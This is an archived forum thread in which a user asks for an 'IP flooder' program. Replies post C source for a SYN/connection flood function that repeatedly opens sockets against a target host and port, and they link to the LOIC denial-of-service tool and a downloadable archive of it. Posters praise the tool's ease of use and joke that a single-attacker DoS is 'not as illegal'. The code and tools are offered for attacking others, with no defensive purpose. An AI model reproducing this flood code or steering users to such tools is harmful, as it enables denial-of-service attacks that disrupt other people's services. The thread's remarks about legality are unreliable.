View Full Version : lookin for IP flood program
Looking for a good IP FLOODER PROGRAM THAT IS LEGIT!
please send link here thanks!
int __cdecl SynAttack(char *target, char *port, char *len)
{
/*if(port == NULL || len == NULL || target == NULL )
return 1;*/
unsigned short p = (unsigned short)atoi(port);
int t = atoi(len);
SOCKADDR_IN addrin;
SOCKET spSocket[FLOODSOCKETS];
IN_ADDR iaddr;
ZeroMemory(&addrin,sizeof(addrin));
addrin.sin_family = AF_INET;
addrin.sin_port = fhtons(p);
LPHOSTENT lpHostEntry = 0;
DWORD mode = 1;
int c = 0,i =0;
unsigned long IP = finet_addr(target);
if (IP==INADDR_NONE) {
hostent *pHE = fgethostbyname(target);
IP = *((unsigned long *)pHE->h_addr_list[0]);
}
unsigned long TargetIP = IP;
iaddr.s_addr = TargetIP;
addrin.sin_addr = iaddr;
while(i < t)
{
for (c=0;c<FLOODSOCKETS;c++)
{
spSocket[c] = fsocket(AF_INET, SOCK_STREAM, 0);
if (spSocket[c] == INVALID_SOCKET)
continue;
fioctlsocket(spSocket[c],FIONBIO,&mode);
}
for (c=0;c<FLOODSOCKETS;c++)
fconnect(spSocket[c], (PSOCKADDR) &addrin, sizeof(addrin));
Sleep(100);
for (c=0;c<FLOODSOCKETS;c++)
fclosesocket(spSocket[c]);
i++;
}
return 1;
}
Low Orbit Ion Cannon (LOIC) http://insurgen.info/wiki/Low_Orbit_Ion_Cannon
http://rapidshare.com/files/256167596/Gay_Pride_Cannon.rar
Thats a dos tool, dont know if thats what you want or not? but its useful and really easy to use.
Low Orbit Ion Cannon (LOIC) http://insurgen.info/wiki/Low_Orbit_Ion_Cannon
http://rapidshare.com/files/256167596/Gay_Pride_Cannon.rar
Thats a dos tool, dont know if thats what you want or not? but its useful and really easy to use.
not very good ;[
not very good ;[
Why not?
Why not?
im saying the program you posted isint very effective
well i've done some reading and apparently its pretty effective... obviously not with one person using it but if lots of people do its a decent tool.
DDOS IS ILLEGAL!
If its only one person doing it its only DOS, so maybe that isnt as illegal. ; )
If its only one person doing it its only DOS, so maybe that isnt as illegal. ; )
lol'd
Powered by vBulletin® Version 4.1.11 Copyright © 2012 vBulletin Solutions, Inc. All rights reserved.